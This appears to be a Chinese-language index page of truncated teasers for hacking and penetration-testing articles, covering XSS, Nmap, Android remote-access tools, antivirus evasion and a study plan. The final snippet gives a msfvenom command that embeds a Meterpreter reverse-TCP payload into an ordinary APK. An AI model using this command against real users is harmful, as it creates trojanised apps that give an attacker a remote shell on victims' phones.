前言：根据前一篇文章已经得到了cookie，那么我们怎么拿到一个网站的最高权限呢？并且得到通过下面篇文章我们得到后台地址一：登录后台打开测试地址如下：出现这样的一个页面，那么现在需要修改...

写在前面：本篇文章将带大家详细了解Web漏洞之XSS(跨站脚本攻击)，文章内容较长，请内心阅读。后面会持续更新Web漏洞系列文章，之前的黑客工具教程文章也会持续更新一、XSS的原理和分类跨站脚本...

前言：随着互联网的迅速发展，网络安全问题日益严峻。黑客攻击和网络漏洞成为让人头痛的问题。为了保护自己的网络安全，安全专家不仅需要了解网络安全原理，还需要熟悉网络渗透工具的使用。Pyth...

一、GScan简单介绍GScan 旨在为安全应急响应人员对 Linux 系统排查时提供便利，实现主机侧 Checklist（检查表） 的自动全面化检测，根据检测结果自动数据聚合，进行黑客攻击路径溯源。二、GScan...

1黑客和网络安全必备工具NMAP-TCP-Scan-教程第一部分-Part2黑客和网络安全必备工具Part-2-–-Shodan-搜索引擎.mp43黑客和网络安全 pentest lab 虚拟机 实验室 免费下载 Vulnhub 适合初级和中级 ...

零、简介最近的一些项目中需要远控安卓设备，所以就整理了四种可以生成远控apk文件的方法：Metasploit、AndroRAT、L3MON以及AyMyth修改版。我这个人比较直率，先说说结论：Metasploit和AndroRAT...

说在前面首先很重要的是授权 ~ 首先很重要的是授权 ~ 首先很重要的是授权 ~之前也看过很多关于渗透测试的文章，但是因为一些现实因素等等问题，没（bu）有(gan)真正实操，最近由于一次偶然的机...

简介Mobexler是基于Elementary OS的定制虚拟机，旨在帮助进行Android和iOS应用程序的渗透测试。Mobexler预装了各种开源工具，脚本，黑客必备软件等，这些都是安全测试Android和iOS应用程序所必...

nmap Nmap，也就是Network Mapper，中文为“网络映射器”。Nmap是一款开源的网络探测和安全审核的工具，它的设计目标是快速地扫描大型网络。它是网络管理员必用的软件之一，以及用以评估网络系...

对目标进行信息收集 1. 域名信息收集 域名（英语：Domain Name），又称网域，是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称，用于在数据传输时对计算机的定位标识（有时...

初级黑客1、网络安全理论知识（2天）①了解行业相关背景，前景，确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。（非常重要） 2、渗透...

技术介绍 免杀技术全称为反杀毒技术 Anti Anti- Virus 简称“免杀”，它指的是一种能使病毒木马免于被杀毒软 件查杀的技术。由于免杀技术的涉猎面非常广，其中包含反汇编、逆向工程、系统漏洞等...

在msf中其实通过help命令就可以看到，我们可以加-x ［正常应用.apk］这个参数来进行捆绑：msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.83 lport=5555 -x 1.apk R>2.apk(ro...